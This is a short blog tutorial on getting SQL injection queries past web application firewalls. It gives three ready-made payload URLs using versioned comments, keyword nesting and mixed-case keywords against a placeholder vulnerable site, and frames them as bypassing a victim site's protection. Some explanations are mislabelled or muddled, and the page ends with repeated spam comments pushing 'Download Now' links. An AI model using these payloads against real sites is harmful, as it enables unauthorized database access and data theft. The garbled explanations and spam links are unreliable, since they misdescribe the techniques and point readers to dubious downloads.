SQL WAF :- SQL ” WAF ” is a Web Application Firewall which protects the site from malicious scripts injected by the hacker to the victims site. It don’t allow scripts to execute and shows the Error ” HTTP FORBIDDEN ” & ” HTTP NOT ACCEPTABLE ” .
So today we will learn how to bypass WAF :-
BY adding special characters to the query
Normal query :- www.vulnerable-site.com/index.php?id=-12 UNION SELECT ALL 1,2,3,4,5–
Bypass query :- www.vulnerable-site.com/index.php?id=-12 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5—
Second way to bypass it :-
By adding Capital letters at first and last :-
Normal query :- www.vulnerable-site.com/index.php?id=-12 UNION SELECT ALL 1,2,3,4,5–
Bypass query :- www.vulnerable-site.com/index.php?id=-12 UNIunionON SEselectLECT 1,2,3,4,5–
Third Way to bypass it :-
BY making the query Capital + small letters combination :-
Normal Query :- www.vulnerable-site.com/index.php?id=-12 UNION SELECT ALL 1,2,3,4,5–
Bypass query :- http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5—
Hope you have love the tutorial How to bypass WAF 
How To Bypass Http Forbidden And Http Not Acceptable In Sql Injection ~ Pwnscar: Info Sec Research Hub >>>>> Download Now
ReplyDelete>>>>> Download Full
How To Bypass Http Forbidden And Http Not Acceptable In Sql Injection ~ Pwnscar: Info Sec Research Hub >>>>> Download LINK
>>>>> Download Now
How To Bypass Http Forbidden And Http Not Acceptable In Sql Injection ~ Pwnscar: Info Sec Research Hub >>>>> Download Full
>>>>> Download LINK